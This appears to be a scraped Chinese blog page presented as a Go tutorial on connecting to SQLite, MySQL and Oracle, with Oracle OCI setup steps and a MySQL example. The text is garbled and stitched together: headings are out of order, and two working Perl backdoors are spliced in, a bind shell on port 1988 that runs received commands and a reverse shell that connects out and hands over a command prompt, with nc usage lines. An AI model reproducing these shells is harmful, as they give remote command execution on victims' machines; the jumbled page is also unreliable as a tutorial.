【Go语言】连接数据库SQLite、MySQL、Oracle

发布时间:2019-07-21  栏目:计算机教程  评论:0 Comments

#!/usr/bin/perl
#ActivePerl 5.8.8 Build 822
#usage:
#first:perl backdoor2c.pl
#second:nc -vv 127.0.0.1 1988
#net user
#ipconfig /all
#netstat -anb
use IO::Socket;
$port = "1988";
my $socket = new IO::Socket::INET(
  'Localhost' => '127.0.0.1',
  'LocalPort' => $port,
  'Listen'  => 1,
  'Proto'   => 'tcp',
  'Reuse'   => 1
);
die "Reason: $!" unless $socket;
while ( my $new_socket = $socket->accept() ) {
  while ( my $buffer = <$new_socket> ) {
    if ( $buffer =~ /exit/ ) { exit; }
    $res_msg = `$buffer`;
    print $new_socket "$res_msg\ncmd>";
  }
}

3_1.Oracle推荐驱动以及准备事项

   本人的数据库相关配置是 版本11.2.0.1.0
    Go版本是1.2
    系统是WIN7旗舰版64位
    按照下面的步骤最终连接上了oracle
①首先是先在机子上安装git(这是必须的吧 作为go开发者)
②下载最新版的OCI尽管我用的是11.2的版本,但是试了n次才返现只有最新的12.1.0.1.0 才管用
    下载地址是http://www.oracle.com/technetwork/cn/database/winx64soft-089540.html
    如果这个地址不好使,可以再baidu是搜Instant Client Downloads for Microsoft Windows (x64)
    需要下载instantclient-basic和instantclient-sdk两个zip文件
    下载后将两个包解压,然后将sdk中的文件sdk文件夹放到instantclient_12_1下,形成instantclient_12_1/sdk目录级
    然后将instantclient_12_1文件夹改名为instantclient_11_2并放到了C盘的跟目录下
③下载MinGW最新版(实际上我用的不是最新的  用的是这个版本x86_64-4.9.0-posix-seh-rt_v3-rev2)
④到https://github.com/wendal/go-oci8下载pkg-config.exe和oci8.pc
    注意先不要把这些源码git到计算机上,只是先下载pkg-config.exe和oci8.pc(在windows目录下)
    下载后进行以下操作
    将pkg-config.exe复制到mingw\bin\下 
    将oci8.pc复制到mingw\lib\pkg-config\下(我的pkg-config是新建的因为原来没有)
    注意,oci8.pc 需要根据你下载的 oci进行修改。下面是我根据我下载的oci版本做的修改。
    # Package Information for pkg-config

    prefix=C:/instantclient_11_2
    exec_prefix=C:/instantclient_11_2
    libdir=${exec_prefix}
    includedir=${prefix}/sdk/include/

    Name: OCI
    Description: Oracle database engine
    Version: 11.2
    Libs: -L${libdir} -loci
    Libs.private: 
    Cflags: -I${includedir}
⑤修改系统环境变量,
    添加 
    PATH=原有PATH;C:\instantclient_11_2;D:\MinGW\bin; (读者根据自己的目录变换一下)
    PKG_CONFIG_PATH=D:\MinGW\lib\pkg-config(读者根据自己的目录变换一下)
⑥下载源码.
    把https://github.com/wendal/go-oci8源码git到本地(这是go-oci库 也就是连接oracle的驱动)
    go get github.com/wendal/go-oci8
    然后执行测试一下吧

回到顶部

by 小杰 都是使用nc监听

2.Go连接MySQL

 反向连接代码:

#!/usr/bin/perl
#usage:
#nc -vv -l -p PORT(default 1988) on your local system first,then
#Perl $0 Remote IP(default 127.0.0.1) Remote_port(default 1988)
#Type 'exit' to exit or press Enter to gain shell when u under the 'console'.
#nc -vv -l -p 1988
#perl backdoor.pl 127.0.0.1 1988

#use strict;
use Socket;
use IO::Socket;
use Cwd;
use IO::Handle;
my $remote   = $ARGV[0] || "127.0.0.1";
my $remote_port = $ARGV[1] || 1988;
my $pack_addr = sockaddr_in( $remote_port, inet_aton($remote) );
my $path = cwd();
$ARGC = @ARGV;

if ( $ARGV[0] !~ /-/ ) {
  socket( SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp') )
   or die "socket error: ";
  STDOUT->autoflush(1);
  SOCKET->autoflush(1);
  $conn = connect( SOCKET, $pack_addr ) || die "connection error : $!";
  open STDIN, ">&SOCKET";
  open STDOUT, ">&SOCKET";
  open STDERR, ">&SOCKET";
  print "You are in $path\n";
  print "Welcome to use.\n";
  print "console>\n";

  while (<STDIN>) {
    chomp;
    if ( lc($_) eq 'exit' ) {
      print " Bye Bye!";
      exit;
    }
    $msg = system($_);
    if ($msg) {
      print STDOUT "\n$msg\n";
      print STDOUT "console>";
    }
    else {
      print "console>";
    }
  }
  close SOCKET;
  exit;
}

3.Go连接Oracle

 这篇文章就结束到这了,希望能帮助到有需要的朋友。

正向连接代码: 

1.Go连接SQLite

2_2.MySQL连接示例代码

示例代码如下:

package main

import (
    "database/sql"
    "fmt"
    _ "github.com/go-sql-driver/mysql"
)

type Users struct {
    UserId int
    Uname  string
}

func main() {
    //db, err := sql.Open("mysql", "user:password@/dbname")
    db, err := sql.Open("mysql", "root:root@/test")
    if err != nil {
        fmt.Println("连接数据库失败")
    }
    defer db.Close()
    var users []Users = make([]Users, 0)
    sqlStr := "select * from users"
    rows, err := db.Query(sqlStr)
    if err != nil {
        fmt.Println(err)
    } else {
        for i := 0; rows.Next(); i++ {
            var u Users
            rows.Scan(&u.UserId, &u.Uname)
            users = append(users, u)
        }
        fmt.Println(users)
    }
}

执行结果为:

[{1 Mike} {2 John}]

-3.Go连接Oracle)

-1.Go连接SQLite)

2_1.MySQL推荐驱动

https://github.com/Go-SQL-Driver/MySQL

回到顶部

留下评论

网站地图xml地图